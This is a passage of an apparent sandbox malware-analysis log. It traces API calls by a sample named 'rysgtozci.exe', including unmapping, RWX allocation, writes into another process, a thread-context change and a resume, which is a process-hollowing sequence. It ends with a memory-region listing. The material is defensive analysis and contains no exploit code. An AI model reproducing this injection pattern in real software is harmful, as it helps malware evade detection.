returned 1 [0099.198] VirtualFree (lpAddress=0x22e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.215] NtUnmapViewOfSection (ProcessHandle=0x1e4, BaseAddress=0x400000) returned 0x0 [0099.218] VirtualAllocEx (hProcess=0x1e4, lpAddress=0x400000, dwSize=0x2f000, flAllocationType=0x3000, flProtect=0x40) returned 0x400000 [0099.231] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x19eac4 | out: Wow64Process=0x19eac4*=1) returned 1 [0099.231] lstrlenW (lpString="rysgtozci.exe") returned 13 [0099.231] lstrlenW (lpString="ntdll.dll") returned 9 [0099.232] lstrlenW (lpString="ntdll.dll") returned 9 [0099.232] lstrlenW (lpString="ntdll.dll") returned 9 [0099.232] lstrlenW (lpString="ntdll.dll") returned 9 [0099.232] lstrlenW (lpString="tdll.dll") returned 8 [0099.232] lstrlenW (lpString="dll.dll") returned 7 [0099.232] lstrlenW (lpString="ll.dll") returned 6 [0099.232] lstrlenW (lpString="l.dll") returned 5 [0099.232] lstrlenW (lpString=".dll") returned 4 [0099.232] CreateFileW (lpFileName="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0099.232] GetFileSize (in: hFile=0x1ec, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1784a0 [0099.232] VirtualAlloc (lpAddress=0x0, dwSize=0x1784a0, flAllocationType=0x3000, flProtect=0x4) returned 0x2160000 [0099.233] ReadFile (in: hFile=0x1ec, lpBuffer=0x2160000, nNumberOfBytesToRead=0x1784a0, lpNumberOfBytesRead=0x19ea94, lpOverlapped=0x0 | out: lpBuffer=0x2160000*, lpNumberOfBytesRead=0x19ea94*=0x1784a0, lpOverlapped=0x0) returned 1 [0099.274] VirtualAlloc (lpAddress=0x0, dwSize=0x17b000, flAllocationType=0x3000, flProtect=0x4) returned 0x22e0000 [0099.312] CloseHandle (hObject=0x1ec) returned 1 [0099.312] VirtualFree (lpAddress=0x2160000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.331] VirtualFree (lpAddress=0x22e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.353] NtWriteVirtualMemory (in: ProcessHandle=0x1e4, BaseAddress=0x400000, Buffer=0x490000*, NumberOfBytesToWrite=0x200, NumberOfBytesWritten=0x19eaf8 | out: Buffer=0x490000*, NumberOfBytesWritten=0x19eaf8*=0x200) returned 0x0 [0099.370] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x19eac4 | out: Wow64Process=0x19eac4*=1) returned 1 [0099.370] lstrlenW (lpString="rysgtozci.exe") returned 13 [0099.370] lstrlenW (lpString="ntdll.dll") returned 9 [0099.371] lstrlenW (lpString="ntdll.dll") returned 9 [0099.371] lstrlenW (lpString="ntdll.dll") returned 9 [0099.371] lstrlenW (lpString="ntdll.dll") returned 9 [0099.371] lstrlenW (lpString="tdll.dll") returned 8 [0099.371] lstrlenW (lpString="dll.dll") returned 7 [0099.371] lstrlenW (lpString="ll.dll") returned 6 [0099.371] lstrlenW (lpString="l.dll") returned 5 [0099.371] lstrlenW (lpString=".dll") returned 4 [0099.371] CreateFileW (lpFileName="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0099.371] GetFileSize (in: hFile=0x1ec, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1784a0 [0099.372] VirtualAlloc (lpAddress=0x0, dwSize=0x1784a0, flAllocationType=0x3000, flProtect=0x4) returned 0x2160000 [0099.372] ReadFile (in: hFile=0x1ec, lpBuffer=0x2160000, nNumberOfBytesToRead=0x1784a0, lpNumberOfBytesRead=0x19ea94, lpOverlapped=0x0 | out: lpBuffer=0x2160000*, lpNumberOfBytesRead=0x19ea94*=0x1784a0, lpOverlapped=0x0) returned 1 [0099.397] VirtualAlloc (lpAddress=0x0, dwSize=0x17b000, flAllocationType=0x3000, flProtect=0x4) returned 0x22e0000 [0099.438] CloseHandle (hObject=0x1ec) returned 1 [0099.438] VirtualFree (lpAddress=0x2160000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.455] VirtualFree (lpAddress=0x22e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.486] NtWriteVirtualMemory (in: ProcessHandle=0x1e4, BaseAddress=0x401000, Buffer=0x491000*, NumberOfBytesToWrite=0x2d200, NumberOfBytesWritten=0x19eaf8 | out: Buffer=0x491000*, NumberOfBytesWritten=0x19eaf8*=0x2d200) returned 0x0 [0099.506] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x19eac4 | out: Wow64Process=0x19eac4*=1) returned 1 [0099.506] lstrlenW (lpString="rysgtozci.exe") returned 13 [0099.506] lstrlenW (lpString="ntdll.dll") returned 9 [0099.506] lstrlenW (lpString="ntdll.dll") returned 9 [0099.506] lstrlenW (lpString="ntdll.dll") returned 9 [0099.506] lstrlenW (lpString="ntdll.dll") returned 9 [0099.506] lstrlenW (lpString="tdll.dll") returned 8 [0099.506] lstrlenW (lpString="dll.dll") returned 7 [0099.506] lstrlenW (lpString="ll.dll") returned 6 [0099.506] lstrlenW (lpString="l.dll") returned 5 [0099.506] lstrlenW (lpString=".dll") returned 4 [0099.506] CreateFileW (lpFileName="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0099.506] GetFileSize (in: hFile=0x1ec, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1784a0 [0099.507] VirtualAlloc (lpAddress=0x0, dwSize=0x1784a0, flAllocationType=0x3000, flProtect=0x4) returned 0x2160000 [0099.507] ReadFile (in: hFile=0x1ec, lpBuffer=0x2160000, nNumberOfBytesToRead=0x1784a0, lpNumberOfBytesRead=0x19ea94, lpOverlapped=0x0 | out: lpBuffer=0x2160000*, lpNumberOfBytesRead=0x19ea94*=0x1784a0, lpOverlapped=0x0) returned 1 [0099.530] VirtualAlloc (lpAddress=0x0, dwSize=0x17b000, flAllocationType=0x3000, flProtect=0x4) returned 0x22e0000 [0099.555] CloseHandle (hObject=0x1ec) returned 1 [0099.555] VirtualFree (lpAddress=0x2160000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.588] VirtualFree (lpAddress=0x22e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.608] NtWriteVirtualMemory (in: ProcessHandle=0x1e4, BaseAddress=0x3b5008, Buffer=0x19f294*, NumberOfBytesToWrite=0x4, NumberOfBytesWritten=0x19eaf8 | out: Buffer=0x19f294*, NumberOfBytesWritten=0x19eaf8*=0x4) returned 0x0 [0099.635] SetThreadContext (hThread=0x1e0, lpContext=0x19ef3c*(ContextFlags=0x10007, Dr0=0x7749a1fe, Dr1=0x19ef9c, Dr2=0x19f038, Dr3=0x7a0, Dr6=0x1a1e64, Dr7=0x536cd652, FloatSave.ControlWord=0x10, FloatSave.StatusWord=0x774ba260, FloatSave.TagWord=0x19f001, FloatSave.ErrorOffset=0x19f080, FloatSave.ErrorSelector=0x1a1714, FloatSave.DataOffset=0xa, FloatSave.DataSelector=0x101efd4, FloatSave.RegisterArea=([0]=0x52, [1]=0xd6, [2]=0x6c, [3]=0x53, [4]=0x7c, [5]=0x1, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0xec, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x2, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x55, [25]=0x28, [26]=0xb6, [27]=0x9a, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x25, [33]=0x2, [34]=0x0, [35]=0xc0, [36]=0x80, [37]=0xf0, [38]=0x19, [39]=0x0, [40]=0x38, [41]=0xf0, [42]=0x19, [43]=0x0, [44]=0xf4, [45]=0xef, [46]=0x19, [47]=0x0, [48]=0x0, [49]=0xf0, [50]=0x19, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0xf4, [65]=0xf0, [66]=0x19, [67]=0x0, [68]=0xa4, [69]=0x9c, [70]=0x49, [71]=0x77, [72]=0x5, [73]=0x28, [74]=0xb6, [75]=0x9a, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x6a2160, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x0, Ebx=0x3b5000, Edx=0x0, Ecx=0x0, Eax=0x41f150, Ebp=0x0, Eip=0x774d8fe0, SegCs=0x23, EFlags=0x202, Esp=0x19fff0, SegSs=0x2b, ExtendedRegisters=([0]=0xf0, [1]=0xf1, [2]=0x19, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x25, [9]=0x2, [10]=0x0, [11]=0xc0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x30, [17]=0xf0, [18]=0x19, [19]=0x0, [20]=0x2b, [21]=0xba, [22]=0x49, [23]=0x77, [24]=0xb8, [25]=0xf0, [26]=0x19, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x9, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x80, [41]=0xf0, [42]=0x19, [43]=0x0, [44]=0x33, [45]=0xb8, [46]=0x49, [47]=0x77, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x59, [53]=0xb8, [54]=0x49, [55]=0x77, [56]=0x45, [57]=0x37, [58]=0xb6, [59]=0x9a, [60]=0xf8, [61]=0xf1, [62]=0x19, [63]=0x0, [64]=0x88, [65]=0xf2, [66]=0x19, [67]=0x0, [68]=0xf0, [69]=0xf1, [70]=0x19, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x94, [77]=0xf1, [78]=0x19, [79]=0x0, [80]=0xb8, [81]=0xf0, [82]=0x19, [83]=0x0, [84]=0xf8, [85]=0xf1, [86]=0x19, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x40, [97]=0xf0, [98]=0x19, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x70, [105]=0xff, [106]=0x19, [107]=0x0, [108]=0x30, [109]=0xee, [110]=0x4d, [111]=0x77, [112]=0xed, [113]=0xe6, [114]=0xfa, [115]=0xed, [116]=0xfe, [117]=0xff, [118]=0xff, [119]=0xff, [120]=0x59, [121]=0xb8, [122]=0x49, [123]=0x77, [124]=0x9e, [125]=0x1, [126]=0x4a, [127]=0x77, [128]=0x20, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x4, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0xf0, [145]=0xf1, [146]=0x19, [147]=0x0, [148]=0xb4, [149]=0xf0, [150]=0x19, [151]=0x0, [152]=0x1, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x88, [157]=0xf2, [158]=0x19, [159]=0x0, [160]=0xc0, [161]=0x1, [162]=0x4a, [163]=0x77, [164]=0x6c, [165]=0xf1, [166]=0x19, [167]=0x0, [168]=0x20, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x12, [177]=0x0, [178]=0x0, [179]=0x1, [180]=0xc0, [181]=0xf0, [182]=0x19, [183]=0x0, [184]=0x6e, [185]=0x0, [186]=0x74, [187]=0x0, [188]=0x64, [189]=0x0, [190]=0x6c, [191]=0x0, [192]=0x6c, [193]=0x0, [194]=0x2e, [195]=0x0, [196]=0x64, [197]=0x0, [198]=0x6c, [199]=0x0, [200]=0x6c, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x6c, [205]=0xf1, [206]=0x19, [207]=0x0, [208]=0x40, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0xc4, [273]=0xf1, [274]=0x19, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x16, [281]=0x0, [282]=0x18, [283]=0x0, [284]=0xc, [285]=0xfc, [286]=0x19, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x80, [291]=0x0, [292]=0xc0, [293]=0xf1, [294]=0x19, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x1, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x90, [306]=0x2f, [307]=0x0, [308]=0x0, [309]=0xc0, [310]=0x2f, [311]=0x0, [312]=0xd4, [313]=0x57, [314]=0x68, [315]=0xf4, [316]=0x39, [317]=0x37, [318]=0xb6, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x2, [323]=0x0, [324]=0x60, [325]=0xf1, [326]=0x19, [327]=0x0, [328]=0x60, [329]=0xf1, [330]=0x19, [331]=0x0, [332]=0x60, [333]=0xf1, [334]=0x19, [335]=0x0, [336]=0x2, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x2, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0xa9, [349]=0x36, [350]=0xb6, [351]=0x9a, [352]=0xe4, [353]=0xf2, [354]=0x19, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0xb5, [361]=0x93, [362]=0x49, [363]=0x77, [364]=0xc, [365]=0xf2, [366]=0x19, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x2c, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x80, [377]=0xf7, [378]=0x19, [379]=0x0, [380]=0xc, [381]=0xfc, [382]=0x19, [383]=0x0, [384]=0x30, [385]=0x94, [386]=0x49, [387]=0x77, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x1, [396]=0x16, [397]=0x0, [398]=0x18, [399]=0x0, [400]=0xc, [401]=0xfc, [402]=0x19, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x48, [429]=0xf7, [430]=0x19, [431]=0x0, [432]=0x9c, [433]=0xb7, [434]=0x49, [435]=0x77, [436]=0xf8, [437]=0xf1, [438]=0x19, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x69, [445]=0x37, [446]=0xb6, [447]=0x9a, [448]=0x1, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x50, [453]=0xf2, [454]=0x19, [455]=0x0, [456]=0x1, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0xcd, [469]=0x35, [470]=0x4a, [471]=0x77, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x9, [481]=0x36, [482]=0x4a, [483]=0x77, [484]=0x0, [485]=0xf2, [486]=0x19, [487]=0x0, [488]=0x60, [489]=0x21, [490]=0x6a, [491]=0x0, [492]=0x7c, [493]=0xf2, [494]=0x19, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x48, [509]=0xf7, [510]=0x19, [511]=0x0))) returned 1 [0099.679] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x19eaec | out: Wow64Process=0x19eaec*=1) returned 1 [0099.681] lstrlenW (lpString="rysgtozci.exe") returned 13 [0099.681] lstrlenW (lpString="ntdll.dll") returned 9 [0099.682] lstrlenW (lpString="ntdll.dll") returned 9 [0099.682] lstrlenW (lpString="ntdll.dll") returned 9 [0099.683] lstrlenW (lpString="ntdll.dll") returned 9 [0099.688] lstrlenW (lpString="tdll.dll") returned 8 [0099.688] lstrlenW (lpString="dll.dll") returned 7 [0099.688] lstrlenW (lpString="ll.dll") returned 6 [0099.688] lstrlenW (lpString="l.dll") returned 5 [0099.688] lstrlenW (lpString=".dll") returned 4 [0099.688] CreateFileW (lpFileName="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0099.689] GetFileSize (in: hFile=0x1ec, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1784a0 [0099.689] VirtualAlloc (lpAddress=0x0, dwSize=0x1784a0, flAllocationType=0x3000, flProtect=0x4) returned 0x2160000 [0099.691] ReadFile (in: hFile=0x1ec, lpBuffer=0x2160000, nNumberOfBytesToRead=0x1784a0, lpNumberOfBytesRead=0x19eabc, lpOverlapped=0x0 | out: lpBuffer=0x2160000*, lpNumberOfBytesRead=0x19eabc*=0x1784a0, lpOverlapped=0x0) returned 1 [0099.716] VirtualAlloc (lpAddress=0x0, dwSize=0x17b000, flAllocationType=0x3000, flProtect=0x4) returned 0x22e0000 [0099.755] CloseHandle (hObject=0x1ec) returned 1 [0099.756] VirtualFree (lpAddress=0x2160000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.781] VirtualFree (lpAddress=0x22e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.802] NtResumeThread (in: ThreadHandle=0x1e0, SuspendCount=0x19eb08 | out: SuspendCount=0x19eb08*=0x1) returned 0x0 [0099.875] ExitProcess (uExitCode=0x0) Thread: id = 6 os_tid = 0x5f8 Thread: id = 7 os_tid = 0x8c0 Thread: id = 8 os_tid = 0x860 Process: id = "3" image_name = "rysgtozci.exe" filename = "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\rysgtozci.exe" page_root = "0x73dea000" os_pid = "0x874" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x3a0" cmd_line = "C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\rysgtozci.exe C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\wduqqtzg" cur_dir = "C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f600" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 445 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 446 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 447 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 448 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 449 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 450 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 451 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 452 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 453 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 454 start_va = 0x400000 end_va = 0x404fff monitored = 1 entry_point = 0x401000 region_type = mapped_file name = "rysgtozci.exe" filename = "\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\rysgtozci.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\rysgtozci.exe") Region: id = 455 start_va = 0x77460000 end_va = 0x775dafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 456 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 457 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 458 start_va = 0x7fff0000 end_va = 0x7ff884cbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 459 start_va = 0x7ff884cc0000 end_va = 0x7ff884e80fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 460 start_va = 0x7ff884e81000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff884e81000" filename = "" Region: id = 463 start_va = 0x400000 end_va = 0x42efff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 472 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 473 start_va = 0x5f960000 end_va = 0x5f9affff monitored = 0 entry_point = 0x5f978180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 474 start_va = 0x5f9b0000 end_va = 0x5fa29fff monitored = 0 entry_point = 0x5f9c3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 475 start_va = 0x76410000 end_va = 0x764effff monitored = 0 entry_point = 0x76423980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 476 start_va = 0x5fa30000 end_va = 0x5fa37fff monitored = 0 entry_point = 0x5fa317c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 477 start_va = 0x560000 end_va = 0x6cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 478 start_va = 0x76410000 end_va = 0x764effff monitored = 0 entry_point = 0x76423980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 479 start_va = 0x77270000 end_va = 0x773edfff monitored = 0 entry_point = 0x77321b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 480 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 481 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 482 start_va = 0x430000 end_va = 0x4edfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 483 start_va = 0x6d0000 end_va = 0x858fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006d0000" filename = "" Region: id = 484 start_va = 0x860000 end_va = 0x9defff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000860000" filename = "" Region: id = 485 start_va = 0x9e0000 end_va = 0xcd9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000009e0000" filename = "" Region: id = 486 start_va = 0x20000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 487 start_va = 0x6d0000 end_va = 0x7cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006d0000" filename = "" Region: id = 488 start_va = 0x20000 end_va = 0x3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 489 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 490 start_va = 0x76b70000 end_va = 0x76beafff monitored = 0 entry_point = 0x76b8e970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 491 start_va = 0x76570000 end_va = 0x7662dfff monitored = 0 entry_point = 0x765a5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 492 start_va = 0x4f0000 end_va = 0x52ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 493 start_va = 0x7d0000 end_va = 0x8cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007d0000" filename = "" Region: id = 494 start_va = 0x758e0000 end_va = 0x75923fff monitored = 0 entry_point = 0x758f9d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 495 start_va = 0x76630000 end_va = 0x766dcfff monitored = 0 entry_point = 0x76644f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 496 start_va = 0x74190000 end_va = 0x741adfff monitored = 0 entry_point = 0x7419b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 497 start_va = 0x74180000 end_va = 0x74189fff monitored = 0 entry_point = 0x74182a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 498 start_va = 0x75880000 end_va = 0x758d7fff monitored = 0 entry_point = 0x758c25c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 499 start_va = 0xce0000 end_va = 0xeaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ce0000" filename = "" Region: id = 500 start_va = 0x1d0000 end_va = 0x1fefff monitored = 1 